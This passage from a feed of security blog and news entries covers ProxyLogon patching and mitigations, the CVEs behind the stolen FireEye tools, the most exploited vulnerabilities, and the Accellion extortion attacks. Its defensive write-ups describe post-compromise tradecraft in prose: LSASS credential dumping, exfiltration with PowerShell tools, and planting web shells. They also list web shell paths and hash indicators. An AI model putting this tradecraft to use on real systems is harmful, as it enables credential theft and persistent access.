You can simply select \u201cqid: 50107\u201d in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches in one go for hosts grouped together by a tag \u2013 Exchange Server 0-day.\n\n\n\nSecurity updates are available for the following specific versions of Exchange:\n\n * [Update for Exchange Server 2019](<https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-march-2-2021-kb5000871-9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b>): Requires Cumulative Update (CU) 8 or CU 7\n * [Update for Exchange Server 2016](<https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-march-2-2021-kb5000871-9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b>): Requires CU 19 or CU 18\n * [Update for Exchange Server 2013](<https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-march-2-2021-kb5000871-9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b>): Requires CU 23\n * [Update for Exchange Server 2010](<https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2010-service-pack-3-march-2-2021-kb5000978-894f27bf-281e-44f8-b9ba-dad705534459>): Requires SP 3 or any SP 3 RU\n * This is a defense-in-depth update.\n\nUsers are encouraged to apply patches as soon as possible.\n\n##### Respond with Mitigation Controls if Patches Cannot Be Applied\n\nWe recognize not all organizations may be able patch their systems right away. In such scenarios Microsoft has recommended a few [interim mitigation controls](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>) to limit the exploitation of these vulnerabilities. 
[Qualys Policy Compliance](<https://www.qualys.com/apps/policy-compliance/>) has added controls based on these recommendations for impacted Exchange Servers 2013, 2016, and 2019. The vulnerability details and corresponding Control IDs (CIDs) are provided below.\n\n**CVE-2021-26855**: This mitigation will filter https requests that contain malicious X-AnonResource-Backend and malformed X-BEResource cookies which were found to be used in the SSRF attacks in the wild. This will help with defense against the known patterns observed but not the SSRF as a whole.\n\n * **CID 20831** - Status of match URL of rewrite rule 'X-BEResource Abort - inbound' for which action is 'AbortRequest at site level\n * **CID 20834** - Status of match URL of rewrite rule 'X-AnonResource-Backend Abort - inbound' for which action is 'AbortRequest at site level\n\n**CVE-2021-26857**: Disabling the UM Service will mitigate this vulnerability.\n\n * **CID 20829** - Status of 'component' installed on the MS Exchange server\n * **CID 20828** - Status of Microsoft Exchange Unified Messaging Call Router service\n * **CID 20827** - Status of Microsoft Exchange Unified Messaging service\n\n**CVE-2021-27065**: Disabling OAB Application Pool will prevent this CVE from executing successfully as the API will no longer respond and return a 503 when calling OAB, which will mitigate the Arbitrary Write exploit that occurs with OAB. 
After stopping the WebApp Pool you will also need to set the OabProxy Server Component state to Inactive.\n\n * **CID 20832** - Check the 'startMode' of the OAB Application Pool (MSExchangeOABAppPool)\n\n**CVE-2021-26858**: Disabling ECP Virtual Directory will prevent CVE-2021-27065 from executing successfully as the API will no longer respond and return a 503 when calling the Exchange Control Panel (ECP).\n\n * **CID 20833** - Check the 'startMode' of the ECP Application Pool (MSExchangeECPAppPool)\n\nQualys Policy Compliance can be used to easily monitor these mitigating controls for impacted Exchange assets.\n\n\n\nDrill down into failing controls to view details and identify issues.\n\n\n\n### Post-Compromise Detection Details\n\nAfter compromising a system, an adversary can perform the following activity:\n\nUse legitimate utilities such as procdump or the rundll32 comsvcs.dll method to dump the LSASS process memory. Presumably, this follows exploitation via CVE-2021-26857 as these methods do need administrative privileges.\n\n\n\nUse 7-Zip or WinRar to compress files for exfiltration.\n\n\n\nUse PowerShell based remote administration tools such as Nishang & PowerCat to exfiltrate this data.\n\n\n\nTo maintain persistent access on compromised systems, adversaries may also create a domain user account and install ASPX- and PHP-based web shells for command and control. 
Their probable locations on disk are listed below.\n\n**Web shell paths**:\n\n`C:\\inetpub\\wwwroot\\aspnet_client\\ \nC:\\inetpub\\wwwroot\\aspnet_client\\system_web\\ \n%PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\ \n%PROGRAMFILES%\\Microsoft\\Exchange Server\\V14\\FrontEnd\\HttpProxy\\owa\\auth\\ \nC:\\Exchange\\FrontEnd\\HttpProxy\\owa\\auth\\`\n\n### References\n\n * https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901\n * https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", "cvss3": {}, "published": "2021-03-03T22:12:19", "type": "qualysblog", "title": "Microsoft Exchange Server Zero-Days (ProxyLogon) \u2013 Automatically Discover, Prioritize and Remediate Using Qualys VMDR", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078"], "modified": "2021-03-03T22:12:19", "id": "QUALYSBLOG:479A14480548534CBF2C80AFA3FFC840", "href": "https://blog.qualys.com/category/vulnerabilities-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-02T02:28:27", "description": "In a blog post on Dec. 
22, 2020, [Qualys revealed](<https://blog.qualys.com/qualys-insights/2020/12/22/qualys-security-advisory-solarwinds-fireeye>) it has identified 7.5 million instances of vulnerability to the stolen FireEye Red Team assessment tools across an anonymized set of its 15,700-member customer base.\n\nOf the 7.5 million instances of vulnerability, 99.84% were caused by only 8 CVEs, and over 99% were caused by these five CVEs: CVE-2020-1472, CVE-2019-0604, CVE-2017-11774, CVE-2016-0167 and CVE-2019-0708.\n\nIn this article, we examine the five CVEs in detail to:\n\n 1. Help SOC and operational security teams understand the behavioral aspects of these CVEs and plan defensive strategies;\n 2. Help threat hunting teams understand their threat attributes and associated attack vectors and take defensive actions against adversaries actively exploiting these CVEs.\n\nFrom a threat perspective, we explore threat attributes like IoCs, signatures, observables, and malware associated (like ransomware, cryptomining, etc.) with the CVEs. Since these CVEs are related to red teaming exercises, we also provide the list of threat actors known to have widely exploited these CVEs. Finally, we explore the adversary Tactics, Techniques and Procedures (TTPs) applicable for each CVE.\n\nWhile Qualys VMDR is well equipped to detect and patch the respective CVEs, we also present the Indicators of Compromise (IoCs) and signature details associated with the CVEs that can be detected using [Qualys Multi-Vector EDR](<https://www.qualys.com/apps/endpoint-detection-response/>). 
The mitigation details are provided with related vendor-released patch details.\n\nFor a detailed walkthrough of this research and how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) and [EDR](<https://www.qualys.com/apps/endpoint-detection-response/>) can help security teams address the threat, please sign up for the webinar on Thursday, February 4 at 10am Pacific: [Unpacking the CVEs in the FireEye Breach](<https://www.brighttalk.com/webcast/11673/467134>). \n\n\n### CVE-2020-1472 (QID: 91668)\n\nA privilege escalation vulnerability exists when an adversary establishes a vulnerable Netlogon secure channel connection to a domain controller using the Netlogon Remote Protocol. An adversary who successfully exploits the vulnerability could run a specially crafted application on a device on the network. See [CVE-2020-1472 security update](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-1472>).\n\nThis vulnerability will further allow an adversary on the same network as the domain controller to forge an authentication token and reset the domain controller password to a value known only by the adversary.\n\nThe following mapping diagram shows the threat mappings to CVE-2020-1472.\n\n\n\n##### Threat Attribution\n\nFollowing the release of the PoC code for this vulnerability on Sept. 11, 2020, a fully functional exploit was included in the "[Mimikatz](<https://github.com/gentilkiwi/mimikatz>)" tool. According to [Microsoft Security Intelligence](<https://twitter.com/MsftSecIntel/status/1313598440719355904>), threat actors quickly launched campaigns that took advantage of the vulnerability\u2019s critical impact and the available exploit. Notable among the threat actors are: TA 505 (aka Chimborazo), Muddywater (aka Mercury), and Ryuk ransomware gang. The threat actors applied the following distinct attack vectors:\n\n 1. 
TA 505 (aka Chimborazo) leveraged the legit tool \u201cMimikatz\u201d to exploit the Zerologon vulnerability and further deployed a campaign with fake updates to connect to the threat actor\u2019s C2 infrastructure to perform escalation of privileges.\n 2. The Ryuk ransomware group exploited the Zerologon vulnerability to escalate privileges on target machines. The actor group was further able to reset passwords on the primary domain controller after which they moved laterally to the second domain controller. Researchers further revealed that the Ryuk group pivoted from the primary domain controller, using RDP to connect to the backup servers. See the [Ryuk in 5 Hours](<https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/>) from the DFIR Report.\n\n##### Prevention and Detection\n\nAdversary attempts to exploit CVE-2020-1472 can be identified by running QID 91668 from Qualys scanner and prevented by applying KB4571736, KB4571702 patches from Microsoft.\n\nIn cases of post-exploitation detection, the following detection methods can be applied.\n\n 1. [Yara rule set](<https://www.cynet.com/zerologon/>) can be used to scan memory dumps of lsass.exe and will alert upon detection of Mimikatz or other Zerologon exploits.\n 2. Scan target infrastructure for existence of the set of [IoCs provided by Qualys](<https://www.qualys.com/docs/fireeye-cve-hashes.txt>).\n\n##### Adversarial TTP\n\nFollowing are the TTP steps sequence that represent adversarial actions:\n\n 1. Valid Accounts: Domain Accounts [[T1078.002](<https://attack.mitre.org/versions/v7/techniques/T1078/002/>)]. Allow unauthenticated adversary to gain escalated privilege to domain controller.\n 2. Lateral Movement [[TA0008](<https://attack.mitre.org/versions/v7/tactics/TA0008/>)]. 
Malicious adversaries can leverage this vulnerability to compromise other devices on the same network\n\n### CVE-2019-0604 (QID: 110330)\n\nA remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package. An adversary successfully exploiting the vulnerability could run arbitrary code in the context of the SharePoint application pool and the SharePoint server farm account. See [CVE-2019-0604 security update](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-0604>).\n\nThe following mapping diagram shows the threat mappings to CVE-2019-0604.\n\n\n\n##### Threat Attribution:\n\nCVE-2019-0604 has been primarily used to install webshells on target SharePoint servers.\n\nEmissary Panda (aka APT27, TG-3390, Bronze Union, Lucky Mouse) threat actor has been identified back in April 2019 to have extensively exploited CVE-2019-0604 to install webshells (primarily China Chopper) on SharePoint servers targeting Government Organizations. 
The threat actor group further performed lateral movement by dumping credentials using Mimikatz in the post-exploitation phase.\n\n##### Prevention and Detection\n\nAdversary attempts to exploit CVE-2019-0604 can be identified by running QID 110330 from the Qualys vulnerability scanner and prevented by applying the KB4462199, KB4462202, KB4462143, KB4462184, KB4461630 and KB4462211 patches (for applicable product versions) from Microsoft.\n\nFor post-exploitation detection, organizations can look for the following [CVE-2019-0604 IoCs](<https://otx.alienvault.com/pulse/5cd3f89df12b501c477a6fba>) within their environment.\n\n##### Adversarial TTP\n\nThe following sequence of TTP steps represents the adversarial actions:\n\n 1. Exploitation for Client Execution [T1203]. Adversaries exploit a deserialization flaw without input validation in the DecodeEntityInstanceId method within the Microsoft.SharePoint.dll library. The method is ultimately exposed to authenticated end users through the picker.aspx page, where a specially crafted web request could lead to execution of arbitrary code.\n 2. Exploitation for Privilege Escalation [T1068]. Adversaries execute a webshell to elevate their privileges on the target SharePoint server.\n 3. 
Lateral Movement [TA0008]: Adversaries use post-exploitation tools like Mimikatz to perform credential dumping and lateral movement on the target network.\n\n### CVE-2019-0708 (QID: 91541, 91534)\n\nA remote code execution vulnerability exists in Remote Desktop Services \u2013 formerly known as Terminal Services \u2013 when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An adversary who successfully exploits this vulnerability could execute arbitrary code on the target system. The adversary could then install programs; view, change, or delete data; or create new accounts with full user rights. See [CVE-2019-0708 security update](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2019-0708>).\n\nThe following mapping diagram shows the threat mappings to CVE-2019-0708.\n\n\n\n##### Threat Attribution\n\nSince CVE-2019-0708 can be exploited remotely by sending a specially crafted RDP request, and given its wormable nature, working PoC exploit code was available 24 hours after the vulnerability was disclosed.\n\nDue to the critical impact this vulnerability has on the target network, it\u2019s heavily targeted by various threat actors, primarily for [cryptomining](<https://twitter.com/GossiTheDog/status/1221219622164353025>).\n\n##### Prevention and Detection\n\nAdversary attempts to exploit CVE-2019-0708 can be identified by running QIDs 91541 and 91534 from the Qualys vulnerability scanner and prevented by applying the KB4499164, KB4499175, KB4499149 and KB4499180 patches (for applicable product versions) from Microsoft.\n\nFor post-exploitation detection, scan target infrastructure for the existence of the set of [IoCs provided by Qualys](<https://www.qualys.com/docs/fireeye-cve-hashes.txt>).\n\n##### Adversarial TTP\n\nThe following sequence of TTP steps represents the adversarial actions:\n\n 1. 
Exploit Public-Facing Application [T1190]. Adversaries scan for internet-facing systems running an affected RDP version.\n 2. Remote Services: Remote Desktop Protocol [T1021.001]: Adversaries send a specially crafted request to the target RDP service.\n 3. Lateral Movement [TA0008]. Owing to the wormable nature of the vulnerability, adversaries perform rapid lateral movement over the target network.\n\n### CVE-2017-11774 (QID: 110306)\n\nA security feature bypass vulnerability exists when Microsoft Outlook improperly handles objects in memory. An adversary who successfully exploits the vulnerability could execute arbitrary commands. An adversary could provide a specially crafted document file designed to exploit the vulnerability, and then convince users to open the document file and interact with the document. See [CVE-2017-11774 security update](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2017-11774>).\n\nThe following mapping diagram shows the threat mappings to CVE-2017-11774.\n\n\n\n##### Threat Attribution\n\nU.S. Cyber Command has [issued an alert](<https://twitter.com/CNMF_CyberAlert/status/1146130046127681536>) about threat actors\u2019 active malicious use of CVE-2017-11774. While the alert did not name the threat actor, further research revealed the threat actor to be APT 33. The threat actor is known for using the exploitation [technique published by SensePost](<https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/>) and combining it with password spraying techniques for lateral movement on the target network.\n\n##### Prevention and Detection\n\nAdversary attempts to exploit CVE-2017-11774 can be identified by running QID 110306 from the Qualys vulnerability scanner and prevented by applying the KB4011178, KB4011196 and KB4011162 patches (for applicable product versions) from Microsoft.\n\nFor post-exploitation detection, the following detection methods can be applied:\n\n 1. 
[Yara rule set](<https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html>) can be used to detect the Outlook home page shell and persistence.\n 2. Scan target infrastructure for the existence of the set of [IoCs provided by Qualys](<https://www.qualys.com/docs/fireeye-cve-hashes.txt>).\n\n##### Adversarial TTP\n\nThe following sequence of TTP steps represents the adversarial actions:\n\n 1. User Execution: Malicious File [T1204.002]. The adversary sends the user a malicious URL or file in a phishing attempt, hoping the user clicks it.\n 2. Office Application Startup \u2013 Outlook Home Page [T1137.004]. When the remote URL is clicked, Outlook renders its contents using the Windows DLL ieframe.dll. This persists through system restarts, allowing the adversary to achieve remote code execution that survives reboots.\n 3. Execution [TA002]. Since the rendered code is persistent, the adversary performs remote code execution.\n 4. Lateral Movement [TA0008]. Adversaries use password spraying techniques to perform lateral movement over the target network.\n\n### CVE-2016-0167 (QID: 91204)\n\nA privilege escalation vulnerability exists when the Windows Graphics Component improperly handles objects in memory. An adversary who successfully exploits this vulnerability could run processes in an elevated context. In a local attack scenario, the adversary could exploit this vulnerability by running a specially crafted application to take control of the affected system. See [CVE-2016-0167 security update](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2016-0167>).\n\nThe following mapping diagram shows the TTP chain and observables related to CVE-2016-0167.\n\n\n\n##### Threat Attribution\n\nThis local privilege escalation was targeted by the \u201cBuggiCorp\u201d threat actor. 
The threat actor created the exploit for the zero-day version of CVE-2016-0167 and put it on sale for $90,000 on the cybercrime forum exploit[dot]in.\n\nIn another instance, a financially motivated threat actor launched spear-phishing email campaigns that exploited CVE-2016-0167. This was [primarily targeted](<https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html>) towards the retail, restaurant and hospitality industries.\n\n##### Prevention and Detection\n\nAdversary attempts to exploit CVE-2016-0167 can be identified by running QID 91204 with the Qualys vulnerability scanner, and prevented by applying the KB3145739 patch from Microsoft.\n\nThe presence of the following observables will allow responders to identify successful exploitation of CVE-2016-0167:\n\nExploit.doc.MVX, Malware.Binary.Doc, PUNCHBUGGY, Malware.Binary.exe, and PUNCHTRACK.\n\nFinally, scan the target infrastructure for the set of [IoCs provided by Qualys](<https://www.qualys.com/docs/fireeye-cve-hashes.txt>) to detect post-exploitation evidence of CVE-2016-0167.\n\n##### Adversarial TTP\n\n 1. Phishing: Spearphishing Attachment [T1566.001]: Adversaries send documents with malicious links to end users.\n 2. Execution [TA0002]. Remote code execution is performed from the malicious link.\n 3. 
Exploitation for Privilege Escalation [T1068]: The adversary performs a local privilege escalation attack through the remotely executed code to gain elevated privileges.\n\n### Remediate with Qualys Patch Management\n\nThis table shows the applicable patch details for each CVE.\n\n**CVE** | **Patch KB** \n---|--- \nCVE-2020-1472 | KB4571736, KB4571702 \nCVE-2019-0604 | KB4462199, KB4462202, KB4462143, KB4462184, KB4461630, KB4462211 \nCVE-2019-0708 | KB4499164, KB4499175, KB4499149, KB4499180 \nCVE-2017-11774 | KB4011178, KB4011196, KB4011162 \nCVE-2016-0167 | KB3145739 \n \nTo view the missing patches in your environment that are required to remediate the vulnerabilities leveraged by the FireEye tools, run the following QQL in the Patches tab of [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>):\n\n`(qid: [91541,372442,38771,91534,91204,110330,371186,91148,90951,43702,374547,372305,110306,50098,91668,13475,53018,13525,150273])`\n\nThe same QQL can be used in the patch assets tab to see all the assets that are missing at least one of the FireEye-related patches. Refer to the image below.\n\nQualys has created two dashboard widgets that you can import into the patch management dashboard. These widgets show the number of missing FireEye-related patches in your environment and the number of assets in your environment missing one of those patches. You can download these two dashboard widgets from the PatchMGMT-Fireeye-Widgets attachment at the bottom of the [FireEye Theft dashboards](<https://qualys-secure.force.com/customer/s/article/000006470>) article.\n\n\n\n### Hunting for Indicators of Compromise with Endpoint Detection and Response (EDR)\n\n[Qualys Multi-Vector EDR](<https://www.qualys.com/apps/endpoint-detection-response/>) helps security teams hunt for exploitation of these CVEs by looking for the files listed in the [provided IoCs](<https://www.qualys.com/docs/fireeye-cve-hashes.txt>). 
End users can search for the above-mentioned IoCs and observables using the Qualys Query Language (QQL). For example, the MD5 hashes for CVE-2019-0604 can be searched using the following QQL:\n\n`file.hash.md5:[\"708544104809ef2776ddc56e04d27ab1\",\"b814532d73c7e5ffd1a2533adc6cfcf8\",\"0eebeef32a8f676a1717f134f114c8bd\",\"5001ef50c7e869253a7c152a638eab8a\"]`\n\n\n\nFurther, Qualys EDR users can assess their exposure to any of the applicable attack vectors by searching for the respective technique and tactic IDs.\n\n\n\n### Resources\n\nSee the comprehensive list of [all IoCs for each CVE](<https://www.qualys.com/docs/fireeye-cve-hashes.txt>) referenced in this article. Right-click to download.\n\n### Assess and Act\n\nThe threat exposure details (threat actor and adversarial TTP chain) for the CVEs presented above prove their high prevalence among cyber attackers, and especially among state-sponsored threat actors, who have been applying complex attack vectors to gain access to target networks by exploiting the above-mentioned CVEs.\n\nWhile the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>) already prioritizes these CVEs (and associated QIDs) for remediation, we envision that the comprehensive threat exposure details presented above will allow both cyber-attack detection and response teams to build an actionable plan to evaluate their exposure to impending attack vectors.\n\n### Learn More\n\nFor a detailed walkthrough of this research and how Qualys VMDR and EDR can help security teams address the threat, please sign up for the webinar:\n\n[**Unpacking the CVEs in the FireEye Breach**](<https://www.brighttalk.com/webcast/11673/467134>) \n**Thursday, February 4 at 10am Pacific**", "cvss3": {}, "published": "2021-02-01T20:40:25", "type": "qualysblog", "title": "Unpacking the CVEs in the FireEye Breach \u2013 Start Here First", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2016-0167", "CVE-2017-11774", "CVE-2019-0604", 
"CVE-2019-0708", "CVE-2020-1472"], "modified": "2021-02-01T20:40:25", "id": "QUALYSBLOG:3B1C0CD4DA2F528B07C93411EA447658", "href": "https://blog.qualys.com/category/vulnerabilities-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:39:17", "description": "[](<https://thehackernews.com/images/-_sUoUckANJU/YQJlBsicySI/AAAAAAAADX0/BEDLvJhwqzYImk1o5ewZhnKeXxnoL0D0wCLcBGAsYHQ/s0/Security-Vulnerabilities.jpg>)\n\nIntelligence agencies in Australia, the U.K., and the U.S. issued a joint advisory on Wednesday detailing the most exploited vulnerabilities in 2020 and 2021, once again demonstrating how threat actors are able to swiftly weaponize publicly disclosed flaws to their advantage.\n\n\"Cyber actors continue to exploit publicly known\u2014and often dated\u2014software vulnerabilities against broad target sets, including public and private sector organizations worldwide,\" the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), the United Kingdom's National Cyber Security Centre (NCSC), and the U.S. 
Federal Bureau of Investigation (FBI) [noted](<https://us-cert.cisa.gov/ncas/alerts/aa21-209a>).\n\n\"However, entities worldwide can mitigate the vulnerabilities listed in this report by applying the available patches to their systems and implementing a centralized patch management system.\"\n\nThe top 30 vulnerabilities span a wide range of software, including remote work, virtual private networks (VPNs), and cloud-based technologies, that cover a broad spectrum of products from Microsoft, VMware, Pulse Secure, Fortinet, Accellion, Citrix, F5 Big IP, Atlassian, and Drupal.\n\nThe most routinely exploited flaws in 2020 are as follows -\n\n * [**CVE-2019-19781**](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) (CVSS score: 9.8) - Citrix Application Delivery Controller (ADC) and Gateway directory traversal vulnerability\n * [**CVE-2019-11510**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) (CVSS score: 10.0) - Pulse Connect Secure arbitrary file reading vulnerability\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) (CVSS score: 9.8) - Fortinet FortiOS path traversal vulnerability leading to system file leak\n * [**CVE-2020-5902**](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) (CVSS score: 9.8) - F5 BIG-IP remote code execution vulnerability\n * [**CVE-2020-15505**](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>) (CVSS score: 9.8) - MobileIron Core & Connector remote code execution vulnerability\n * [**CVE-2020-0688**](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) (CVSS score: 8.8) - Microsoft Exchange memory corruption vulnerability\n * [**CVE-2019-3396**](<https://nvd.nist.gov/vuln/detail/CVE-2019-3396>) (CVSS score: 9.8) - Atlassian Confluence Server remote code execution vulnerability\n * [**CVE-2017-11882**](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>) (CVSS score: 7.8) - Microsoft Office memory corruption vulnerability\n * [**CVE-2019-11580**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11580>) (CVSS score: 
9.8) - Atlassian Crowd and Crowd Data Center remote code execution vulnerability\n * [**CVE-2018-7600**](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>) (CVSS score: 9.8) - Drupal remote code execution vulnerability\n * [**CVE-2019-18935**](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>) (CVSS score: 9.8) - Telerik .NET deserialization vulnerability resulting in remote code execution\n * [**CVE-2019-0604**](<https://nvd.nist.gov/vuln/detail/CVE-2019-0604>) (CVSS score: 9.8) - Microsoft SharePoint remote code execution vulnerability\n * [**CVE-2020-0787**](<https://nvd.nist.gov/vuln/detail/CVE-2020-0787>) (CVSS score: 7.8) - Windows Background Intelligent Transfer Service (BITS) elevation of privilege vulnerability\n * [**CVE-2020-1472**](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) (CVSS score: 10.0) - Windows [Netlogon elevation of privilege](<https://thehackernews.com/2021/02/microsoft-issues-patches-for-in-wild-0.html>) vulnerability\n\nThe vulnerabilities that have come under active attack thus far in 2021 are listed below -\n\n * [Microsoft Exchange Server](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>): [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>), [CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>), [CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>), and [CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>) (aka \"ProxyLogon\")\n * [Pulse Secure](<https://thehackernews.com/2021/05/new-high-severity-vulnerability.html>): [CVE-2021-22893](<https://nvd.nist.gov/vuln/detail/CVE-2021-22893>), [CVE-2021-22894](<https://nvd.nist.gov/vuln/detail/CVE-2021-22894>), [CVE-2021-22899](<https://nvd.nist.gov/vuln/detail/CVE-2021-22899>), and [CVE-2021-22900](<https://nvd.nist.gov/vuln/detail/CVE-2021-22900>)\n * [Accellion](<https://thehackernews.com/2021/03/extortion-gang-breaches-cybersecurity.html>): 
[CVE-2021-27101](<https://nvd.nist.gov/vuln/detail/CVE-2021-27101>), [CVE-2021-27102](<https://nvd.nist.gov/vuln/detail/CVE-2021-27102>), [CVE-2021-27103](<https://nvd.nist.gov/vuln/detail/CVE-2021-27103>), and [CVE-2021-27104](<https://nvd.nist.gov/vuln/detail/CVE-2021-27104>)\n * [VMware](<https://thehackernews.com/2021/06/alert-critical-rce-bug-in-vmware.html>): [CVE-2021-21985](<https://nvd.nist.gov/vuln/detail/CVE-2021-21985>)\n * Fortinet: [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>), [CVE-2020-12812](<https://nvd.nist.gov/vuln/detail/CVE-2020-12812>), and [CVE-2019-5591](<https://nvd.nist.gov/vuln/detail/CVE-2019-5591>)\n\nThe development also comes a week after MITRE [published](<https://cwe.mitre.org/top25/archive/2021/2021_cwe_top25.html>) a list of top 25 \"most dangerous\" software errors that could lead to serious vulnerabilities that could be exploited by an adversary to take control of an affected system, obtain sensitive information, or cause a denial-of-service condition.\n\n\"The advisory [...] puts the power in every organisation's hands to fix the most common vulnerabilities, such as unpatched VPN gateway devices,\" NCSC Director for Operations, Paul Chichester, [said](<https://www.ncsc.gov.uk/news/global-cyber-vulnerabilities-advice>), urging the need to prioritize patching to minimize the risk of being exploited by malicious actors.\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-07-29T08:21:00", "type": "thn", "title": "Top 30 Critical Security Vulnerabilities Most Exploited by Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-13379", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2019-5591", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-12812", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-5902", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-08-04T09:03:14", "id": "THN:B95DC27A89565323F0F8E6350D24D801", "href": "https://thehackernews.com/2021/07/top-30-critical-security.html", 
"cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:06", "description": "[](<https://thehackernews.com/images/-o4PjWjTeBCk/YDSsM4Y2pnI/AAAAAAAAB3A/s_vIwO-nBdgTSgGdEET9fFhVzK0QVUeuwCLcBGAsYHQ/s0/data-breach.jpg>)\n\nCybersecurity researchers on Monday tied a [string of attacks](<https://thehackernews.com/2021/02/data-breach-exposes-16-million-jobless.html>) targeting Accellion File Transfer Appliance (FTA) servers over the past two months to data theft and extortion campaign orchestrated by a cybercrime group called **UNC2546**.\n\nThe attacks, which began in mid-December 2020, involved exploiting multiple zero-day vulnerabilities in the legacy FTA software to install a new web shell named DEWMODE on victim networks and exfiltrating sensitive data, which was then published on a data leak website operated by the CLOP ransomware gang.\n\nBut in a twist, no ransomware was actually deployed in any of the recent incidents that hit organizations in the U.S., Singapore, Canada, and the Netherlands, with the actors instead resorting to extortion emails to threaten victims into paying bitcoin ransoms.\n\nAccording to [Risky Business](<https://risky.biz/newsletter44/>), some of the companies that have had their data listed on the site include Singapore's telecom provider [SingTel](<https://www.singtel.com/personal/support/about-accellion-security-incident>), the American Bureau of Shipping, law firm [Jones Day](<https://www.wsj.com/articles/hacker-claims-to-have-stolen-files-belonging-to-prominent-law-firm-jones-day-11613514532>), the Netherlands-based [Fugro](<https://www.fugro.com/media-centre/news/fulldetails/2021/02/12/cyber-security-incident-third-party-supplier-of-fugro>), and life sciences company 